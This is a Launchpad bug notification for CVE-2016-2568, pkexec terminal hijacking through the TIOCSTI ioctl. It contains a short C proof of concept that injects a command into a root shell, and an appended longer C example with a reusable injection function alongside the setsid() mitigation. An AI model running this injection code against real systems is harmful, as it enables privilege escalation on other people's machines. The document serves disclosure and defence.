This is CVE-2016-2568, and there is no solution to this issue as of
today.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-2568

** Bug watch added: Debian Bug tracker #816062
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=816062

** Also affects: policykit-1 (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=816062
   Importance: Unknown
       Status: Unknown

** Changed in: policykit-1 (Ubuntu)
       Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1535768

Title:
  pkexec tty hijacking via TIOCSTI ioctl

Status in policykit-1 package in Ubuntu:
  Confirmed
Status in policykit-1 package in Debian:
  Unknown

Bug description:
  When executing a program via "pkexec --user nonpriv program" the nonpriv 
session can escape to the parent session by using the TIOCSTI ioctl to push 
characters into the terminal's input buffer, allowing privilege escalation.
  This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in 
"sudo" by using the "use_pty" flag.

  $ cat test.c 
  #include <sys/ioctl.h>   /* ioctl(), TIOCSTI */

  /* PoC: push "id\n" into the input queue of the terminal on fd 0, one byte
   * per ioctl, as if it had been typed.  The shell that owns the terminal
   * (here the root shell that ran pkexec) reads the line and executes it. */
  int main(void)
  {
        const char *cmd = "id\n";
        while (*cmd)
                ioctl(0, TIOCSTI, cmd++);
        return 0;
  }

  $ gcc test.c -o test
  $ id
  uid=1000(saken) gid=1000(saken) groups=1000(saken)

  
  # pkexec --user saken ./test     ----> last command I type in
  id
  # id    ----> did not type this
  uid=0(root) gid=0(root) groups=0(root)

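The following is an added example, not code from the bug report or from polkit: it puts the report's TIOCSTI primitive next to the setsid()-based mitigation it credits to su. The kernel allows TIOCSTI only when the target terminal is the caller's controlling terminal (or the caller has CAP_SYS_ADMIN), so a child that calls setsid() before exec has no controlling terminal and the ioctl on the inherited fd fails with EPERM. All function names here are the example's own; `/dev/null` is used in the non-interactive paths only to show the ENOTTY case.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push every byte of `line` into the input queue of the terminal behind `fd`,
 * as if typed.  Returns 0 on success or -errno: ENOTTY for a non-terminal,
 * EPERM when `fd` is not the caller's controlling terminal (no CAP_SYS_ADMIN). */
int tiocsti_inject(int fd, const char *line)
{
    for (const char *p = line; *p != '\0'; p++)
        if (ioctl(fd, TIOCSTI, p) == -1)
            return -errno;
    return 0;
}

/* Same, but opens `path` first (assumed helper for testing; O_NOCTTY so a
 * terminal opened here never becomes our controlling tty). */
int tiocsti_inject_path(const char *path, const char *line)
{
    int fd = open(path, O_RDWR | O_NOCTTY);
    if (fd == -1)
        return -errno;
    int rc = tiocsti_inject(fd, line);
    close(fd);
    return rc;
}

/* Attempt the injection from a child.  With `detach` set the child calls
 * setsid() first: new session, no controlling terminal, so the kernel answers
 * TIOCSTI on the inherited fd with EPERM.  Returns the child's -errno
 * (0 = injected), -200 if setsid() failed, -1 if the child was not observed. */
int inject_from_child(int fd, const char *line, int detach)
{
    pid_t pid = fork();
    if (pid == -1)
        return -errno;
    if (pid == 0) {
        if (detach && setsid() == -1)
            _exit(200);
        _exit(-tiocsti_inject(fd, line));   /* errno values fit in 8 bits */
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return -WEXITSTATUS(status);
}

/* The fix pattern for a pkexec-style launcher: give the less privileged
 * command its own session before exec so it cannot reach the caller's
 * terminal.  Returns the command's exit status, 127 on exec failure. */
int run_in_new_session(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid == -1)
        return -errno;
    if (pid == 0) {
        if (setsid() == -1)   /* cannot fail: a fresh child is never a group leader */
            _exit(127);
        execv(path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    if (!isatty(STDIN_FILENO)) {
        puts("stdin is not a terminal; run this from an interactive shell");
        return 1;
    }
    /* Without setsid() the child shares our controlling terminal, so the
     * injected "id\n" lands in the shell that launched this program. */
    int rc = inject_from_child(STDIN_FILENO, "id\n", 0);
    printf("child without setsid: %s\n", rc == 0 ? "injected" : strerror(-rc));
    rc = inject_from_child(STDIN_FILENO, "id\n", 1);
    printf("child with setsid:    %s\n", rc == 0 ? "injected" : strerror(-rc));
    return 0;
}
```

Run it from an interactive shell: the first child injects `id` into that shell, the second reports EPERM. Two caveats a practitioner should check on the target system: a child running with CAP_SYS_ADMIN (for example as root) passes the controlling-terminal check anyway, so setsid() only protects when the launched command is less privileged; and on Linux 6.2 and later, kernels built with CONFIG_LEGACY_TIOCSTI disabled or with `dev.tty.legacy_tiocsti=0` refuse TIOCSTI outright (EIO), independent of sessions.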


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net